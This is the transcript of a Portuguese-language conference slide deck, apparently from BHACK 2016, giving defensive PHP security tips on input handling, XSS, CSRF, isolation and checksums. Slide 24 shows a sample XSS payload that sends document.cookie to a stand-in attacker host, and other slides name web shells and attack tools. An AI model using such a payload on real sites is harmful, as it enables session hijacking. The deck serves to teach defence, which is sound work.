Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Dicas de segurança para o PHP e seus amigos

Joubert RedRat
November 18, 2016
Technology
0
26

Dicas de segurança para o PHP e seus amigos

Joubert RedRat

November 18, 2016
Tweet

More Decks by Joubert RedRat

See All by Joubert RedRat
Retome o controle do seu analytics com Matomo
joubertredrat
0
24
#tbt do PHP, a evolução da linguagem nos últimos 30 anos
joubertredrat
0
26
DevBox, o meu pequeno projeto open source para o dia a dia do dev
joubertredrat
0
25
O poder do Object Calisthenics no PHP
joubertredrat
0
98
Playing with Docker and Docker Compose
joubertredrat
0
120
Why migrate your application to microservices?
joubertredrat
0
17
Por que migrar sua aplicação para Microserviços?
joubertredrat
0
25
Uso prático de fakes para mocks no Golang
joubertredrat
0
79
Brincando com comandos no Golang
joubertredrat
0
170

Other Decks in Technology

See All in Technology
分解して理解する Aspire
nenonaninu
1
180
RECRUIT TECH CONFERENCE 2025 プレイベント【高橋】
recruitengineers
PRO
0
160
明日からできる!技術的負債の返済を加速するための実践ガイド~『ホットペッパービューティー』の事例をもとに~
recruitengineers
PRO
3
400
開発組織のための セキュアコーディング研修の始め方
flatt_security
3
2.4k
JEDAI Meetup! Databricks AI/BI概要
databricksjapan
0
110
次世代KYC活動報告 / 20250219-BizDay17-KYC-nextgen
oidfj
0
260
スタートアップ1人目QAエンジニアが QAチームを立ち上げ、“個”からチーム、 そして“組織”に成長するまで / How to set up QA team at reiwatravel
mii3king
2
1.5k
プロセス改善による品質向上事例
tomasagi
2
2.6k
利用終了したドメイン名の最強終活〜観測環境を育てて、分析・供養している件〜 / The Ultimate End-of-Life Preparation for Discontinued Domain Names
nttcom
2
200
RSNA2024振り返り
nanachi
0
580
PHPカンファレンス名古屋-テックリードの経験から学んだ設計の教訓
hayatokudou
2
320
個人開発から公式機能へ: PlaywrightとRailsをつなげた3年の軌跡
yusukeiwaki
11
3k

Featured

See All Featured
Raft: Consensus for Rubyists
vanstee
137
6.8k
Six Lessons from altMBA
skipperchong
27
3.6k
Code Reviewing Like a Champion
maltzj
521
39k
Put a Button on it: Removing Barriers to Going Fast.
kastner
60
3.7k
Adopting Sorbet at Scale
ufuk
74
9.2k
GraphQLとの向き合い方2022年版
quramy
44
13k
A Tale of Four Properties
chriscoyier
158
23k
GraphQLの誤解/rethinking-graphql
sonatard
68
10k
Responsive Adventures: Dirty Tricks From The Dark Corners of Front-End
smashingmag
251
21k
How STYLIGHT went responsive
nonsquared
98
5.4k
Optimising Largest Contentful Paint
csswizardry
34
3.1k
Fight the Zombie Pattern Library - RWD Summit 2016
marcelosomers
233
17k

Transcript

  1. Dicas de segurança para o PHP e seus amigos BHACK

    2016 – SEGURANÇA TI CONHECIMENTO

  2. Eu? Sou este ai https://github.com/joubertredrat https://br.linkedin.com/in/joubertredrat https://twitter.com/joubertredrat http://www.vivaolinux.com.br/~joubertredrat * no

    meu Linkedin explica o porque do apelido RedRat https://creativecommons.org/licenses/by-sa/4.0/ Dicas de segurança para o PHP e seus amigos

  3. Dicas de segurança para o PHP e seus amigos INFORMAÇÃO

    É PODER QUEM TEM INFORMAÇÃO DOMINA O MUNDO

  4. Dicas de segurança para o PHP e seus amigos 1ª

    DICA REMOVER INFORMAÇÕES DESNECESSÁRIAS

  5. Dicas de segurança para o PHP e seus amigos 1ª

    DICA - REMOVER INFORMAÇÕES DESNECESSÁRIAS

  6. Dicas de segurança para o PHP e seus amigos 1ª

    DICA - REMOVER INFORMAÇÕES DESNECESSÁRIAS

  7. Dicas de segurança para o PHP e seus amigos 2ª

    DICA ISOLAR SUAS APLICAÇÕES, SITES OU SISTEMAS

  8. Dicas de segurança para o PHP e seus amigos 2ª

    DICA - ISOLAR SUAS APLICAÇÕES, SITES OU SISTEMAS

  9. Dicas de segurança para o PHP e seus amigos 3ª

    DICA DESABILITAR OU EVITAR RECURSOS EXTERNOS

  10. Dicas de segurança para o PHP e seus amigos 3ª

    DICA - DESABILITAR OU EVITAR RECURSOS EXTERNOS R57 R6 C99Shell C100Shell bypass Tool25 b374k GaZa

  11. Dicas de segurança para o PHP e seus amigos 3ª

    DICA - DESABILITAR OU EVITAR RECURSOS EXTERNOS http://php.net/allow-url-include

  12. Dicas de segurança para o PHP e seus amigos 4ª

    DICA USAR URL AMIGÁVEIS E EVITAR QUERY STRING

  13. Dicas de segurança para o PHP e seus amigos 4ª

    DICA - USAR URL AMIGÁVEIS E EVITAR QUERY STRING

  14. Dicas de segurança para o PHP e seus amigos 5ª

    DICA TRATAR OS DADOS VINDOS DO USUÁRIO MESMO ASSIM QUER USAR QUERY STRING? 4ª DICA - USAR URL AMIGÁVEIS E EVITAR QUERY STRING

  15. Dicas de segurança para o PHP e seus amigos 5ª

    DICA - TRATAR OS DADOS VINDOS DO USUÁRIO filter_var mysqli_stmt_bind_param PDOStatement::bindValue DateTime::getLastErrors(); is_(bool,callable,numeric,float,string,object,etc) Libs no Packagist

  16. Dicas de segurança para o PHP e seus amigos 5ª

    DICA - TRATAR OS DADOS VINDOS DO USUÁRIO Quer fazer testes? sqlmap Zed Attack Proxy “ZAP” BeEF sqlninja

  17. Dicas de segurança para o PHP e seus amigos 6ª

    DICA EVITAR O USO DA PRIMARY KEY OU ID

  18. Dicas de segurança para o PHP e seus amigos 6ª

    DICA - EVITAR O USO DA PRIMARY KEY OU ID • UUID • GUID • MD5/CRC32/SHA1/SHA256 • Hash ou Ofuscamento

  19. Dicas de segurança para o PHP e seus amigos 6ª

    DICA - EVITAR O USO DA PRIMARY KEY OU ID

  20. Dicas de segurança para o PHP e seus amigos 7ª

    DICA (PRIMA DA 5ª DICA) CROSS-SITE SCRIPTING

  21. Dicas de segurança para o PHP e seus amigos 7ª

    DICA - CROSS-SITE SCRIPTING

  22. Dicas de segurança para o PHP e seus amigos 7ª

    DICA - CROSS-SITE SCRIPTING

  23. Dicas de segurança para o PHP e seus amigos 7ª

    DICA - CROSS-SITE SCRIPTING

  24. Dicas de segurança para o PHP e seus amigos 7ª

    DICA - CROSS-SITE SCRIPTING results.php?q=<script>window.open("http://site.do.mal/get.php?cookie=" + document.cookie, "_blank");</script>

  25. Dicas de segurança para o PHP e seus amigos 8ª

    DICA CROSS SITE REQUEST FORGERY

  26. Dicas de segurança para o PHP e seus amigos 8ª

    DICA - CROSS SITE REQUEST FORGERY

  27. Dicas de segurança para o PHP e seus amigos 9ª

    DICA USAR CHECKSUM OU O VCS AO SEU FAVOR

  28. Dicas de segurança para o PHP e seus amigos 9ª

    DICA - USAR CHECKSUM OU O VCS AO SEU FAVOR

  29. Dicas de segurança para o PHP e seus amigos ACABOU

    AS DICAS POR HOJE PERGUNTAS? FALA QUE NÃO TEM 